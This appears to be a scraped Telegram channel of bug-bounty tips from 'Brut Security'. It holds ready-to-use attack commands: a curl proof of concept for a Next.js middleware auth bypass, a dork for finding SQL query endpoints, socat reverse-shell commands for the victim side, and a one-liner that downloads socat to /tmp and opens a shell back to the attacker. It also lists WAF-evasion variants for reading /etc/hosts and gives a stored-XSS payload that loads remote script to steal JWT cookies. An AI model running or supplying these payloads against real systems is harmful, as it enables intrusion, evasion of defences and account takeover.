Brut Security
14.8K subscribers
950 photos
76 videos
290 files
994 links
βœ…Queries: @wtf_brut
πŸ›ƒWhatsApp: wa.link/brutsecurity
🈴Training: brutsec.com
πŸ“¨E-mail: [email protected]
Download Telegram
πŸ”₯With the right dork, the whole game changesβ€”recon becomes domination.😌

Dork: inurl:search.php inurl:sqlQuery inurl:&

For more followπŸ‘‰πŸΌ DarkShadow

#bugbountytips
πŸ‘17πŸ”₯5❀1πŸ‘1🐳1
πŸŒ€ This is wild!

You’ve probably seen the buzz around the Next.js middleware auth bypass (CVE-2025-29927) β€” but there’s another less-known yet similar vulnerability: CVE-2024-51479.

This flaw allows attackers to bypass authentication by abusing the __nextLocale query parameter in the URL, tricking the middleware into granting access to protected routes.

Proof of Concept (PoC):

curl https://target.com/?__nextLocale=/admin

This vulnerability was fixed in Next.js v14.2.15, and Vercel-hosted apps have already been patched automatically.

I found a very cool article explaining everything in detail:

https://gmo-cybersecurity.com/blog/another-nextjs-middleware-bypass-en
πŸ‘8❀5πŸ”₯5πŸ‘3🫑1
This media is not supported in your browser
VIEW IN TELEGRAM
πŸš€ New Script Alert – Subdomain Monitoring (Coming Soon!)
from Brut Security

For those who’ve been waiting on a simple and efficient way to monitor subdomains automatically β€” your wait is almost over. 😌

We’ve been working on a Bash script that:

βœ… Monitors your target domains every 6 hours
βœ… Uses subfinder, anew, and notify
βœ… Sends actual new subdomains as file attachments directly to your Discord webhook
βœ… Clean, lightweight & made for practical usage in recon and bug bounty

The release isn’t today β€” dropping next week, but thought I’d give you all a heads-up.

If you’re into bug hunting, automation, or OSINT β€” this might be super useful for your workflow.

πŸ” Share with your team
❀️ React if you’re excited
Let’s get the word out before the launch!

#BrutSecurity #bugbounty #subdomainmonitoring #infosec #recon #bashscript #automation
21❀30πŸ‘6πŸ”₯4πŸ‘2
API_Hacking_with_Javascript_Checklist.pdf
47.1 MB
API Hacking with Javascript Checklist - 5 things that you should look for in JS files for API hacking.
πŸ”₯22❀13
⚑Convert your basic nc reverse shell to a pro interactive shellπŸ˜‰

⚑Bash Series for bug hunters😎

Part-1
Use python to Spawn a TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'

Use this command to use clear command:
export TERM=xterm-256color

Get a sexy shell prompt:
PS1='\[\033[01;32m\]\u@\h \[\033[01;34m\]\w\[\033[01;31m\]$\[\033[00m\] '

Use those alias for speed up:
export EDITOR=nano
alias mm=clear
alias ls='ls --color=auto'
alias ll='ls -la --color=auto'
alias grep='grep --color=auto'


To close the shell temporally:
Press control+Z

Use this command to back again session:
stty raw -echo; fg


Guys, do you all want a smart alternative to nc where you can use nano, vim, and have full keyboard controls (like Ctrl+C, etc.)?

😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯10πŸ—Ώ8πŸ‘5
⚑Bypass Series for bug hunters😎

Part-3

Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

cat < /etc/hosts
cat /proc/self/fd/0 < /etc/hosts
cat /etc/hosts | base64 | base64 -d
cat /etc/hosts | string collect
cat /etc/hosts | while read line; echo $line; end
echo (cat /etc/hosts)

😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ‘8❀5πŸ”₯3
⚑Bash Series for bug hunters😎

Part-2

Stop using directly nc and try with the following command:
rlwrap -cAr nc -lvnp <port>
Or
rlwrap -f . -r nc -lnvp <port>

Now you can use arrow keys for command history navigation, but you still won't get full keyboard functionality (e.g., nano, CTRL shortcuts).

For full interactive keyboard controls, use a socat interactive shell:

On attacker side:
socat file:tty,raw,echo=0 tcp-listen:<port>
If it throws any error, try:
socat file:$(tty),raw,echo=0 tcp-listen:<port>

On victim side (for a full TTY reverse shell):
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>

If socat is not installed on the victim machine, use this one-liner to download a static binary:
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<ip>:<port>

to stop socat:
ps aux | grep socat
Kill -9 socat <PID>

Note: Replace <port> with your desired port, <attacker_ip> with your IP, and <PID> with the process ID.


😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯9❀2πŸ‘1
⚑HackerOne was vulnerable to a critical SSRF that allowed reading AWS metadata β€” disclosed and rewarded $25,000! 🀯

πŸŒ€ The Core Issue:
An SSRF via a <template> field allowed AWS credential access by injecting an <iframe> when generating a PDF report from analytics.

POC Steps:

1. Go to https://hackerone.com/organizations/ORG/analytics/reports
2. Create a new report
3. Select any filters
4. Click β€œApply” (intercept the request here)
5. In any template field, inject an HTML payload
6. Use an <iframe> to read internal files like AWS metadata

Even though it's an old report, the technique builds solid SSRF understanding.
If you're into smart and simple exploitation tricks β€” don’t forget to react & share ❀️

😁Follow meπŸ‘‰πŸΌ DarkShadow
πŸ”₯28❀10πŸ—Ώ9πŸ‘5🫑2
This is really cool πŸ”₯

An FFUF wrapper by @rez0__ that automatically suggests file extensions for fuzzing by analysing target URL and headers.

https://github.com/jthack/ffufai?tab=readme-ov-file

#bugbountytips #bugbounty #cybersecurity
πŸ‘13πŸ”₯2
⚑Bypass Series for bug hunters😎

Part-4
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

rev /etc/hosts | rev
od -An -c /etc/hosts | tr -d ' '
cat $HOME/../../etc/hosts
cat ${PWD}/../../../etc/hosts
grep "" /etc/hosts
cut -c1- /etc/hosts
paste /etc/hosts

Guys, what do you think about those WAF bypass techniques I created?
Hold on for the last one β€” it's really awesome!😎

😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯9❀7πŸ‘5
⚑Bash Series for bug hunters😎

Part-2


Create multiple folders using one-liner:

mkdir {dev,test,prod}

This command will create 3 directories (dev, test, prod) at a time.


Creating Multiple Files Efficiently:

touch {file1,file2,file3}.txt

File creates like file1.txt, file2.txt file3.txt


Generating Files with Numeric Sequences:

seq -w 1 10 | xargs -I {} touch file{}.txt

This sequence creates file's:
file01.txt, file02.txt, file03.txt .... To file10.txt


Boost your bug hunting with pro Bash commands β€” a must for every hacker!
Don't forget to reactπŸ”₯


😁Follow meπŸ‘‰πŸΌ DarkShadow

#Bugbountytips #series@brutsecurity
πŸ”₯13πŸ‘4
program-list.json
1.1 MB
πŸŒ€Helpful Websites for Finding Bug Bounty and Vulnerability Disclosure Programs.⚑

Explore databases that list active bug bounty and vulnerability disclosure programs to help security researchers find opportunities to report vulnerabilities and earn rewards.

https://disclose.io/programs/

You can also download all programs in JSON format, provided the JSON file.

Don't forget to react πŸ”₯
😁 Follow me πŸ‘‰πŸΌ
DarkShadow

#BugBountytips
πŸ”₯22πŸ‘3🀝2
⚑Popular HackerOne target Agoda.com was vulnerable to Stored XSS β€” Rewarded $3,200😬

πŸŒ€Core Issue:

By adding a new property (Apartment/Flat) and injecting a malicious script, the backend failed to properly sanitize user input. Validation was only enforced on the frontend.

πŸŒ€Affected Functionality:
Property listing creation, including:
 ‒ Property Name
 ‒ Property Description
 ‒ Company Name
 ‒ Company Address

πŸ’₯Injection Payload:
"><script src=https://hackbx.bxss.in></script>

This single payload can be used to execute thousands of XSS scripts.


πŸ”₯Impact:
On page load, the stored XSS steals the user’s JWT token from cookies, enabling full account takeover with zero user interaction.

😁 Follow meπŸ‘‰πŸΌ DarkShadow
#BugBountytips
πŸ—Ώ12❀4πŸ”₯4πŸ‘1πŸ‘¨β€πŸ’»1
What do you think about these kinds of proof-of-concepts and bug bounty tips?
Drop your thoughts in the comments β€” I’d love to hear your feedback and what you'd like to see next!😁❀️
❀24πŸ‘11
We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they don’t even mention or credit us after copying our content.
πŸ‘25❀13😒4
Brut Security pinned Β«We enabled copyright protection because many people keeps copying our posts and sharing them on their X accounts, Telegram channels, and groups without any effort. The most frustrating part is that they don’t even mention or credit us after copying our content.Β»
⚑Bypass Series for bug hunters😎

Part-5 (last part)
Crazy WAF Bypass:
cat /etc/hosts - triggers WAF

tar cf - /etc/hosts | tar xf - -O
gzip -c /etc/hosts | gzip -d
less /e*c/h*st*
more /e{t,c}*/{o,h}*s*{s,t}
strings /??c/??sts
sort /etc/hosts | uniq

guys, these are some custom payloads I personally crafted β€” highly effective at bypassing firewalls and evading detection.

For more follow meπŸ‘‰πŸΌ DarkShadow


#Bugbountytips #series@brutsecurity
πŸ”₯13🀝3πŸ‘2πŸ‘¨β€πŸ’»2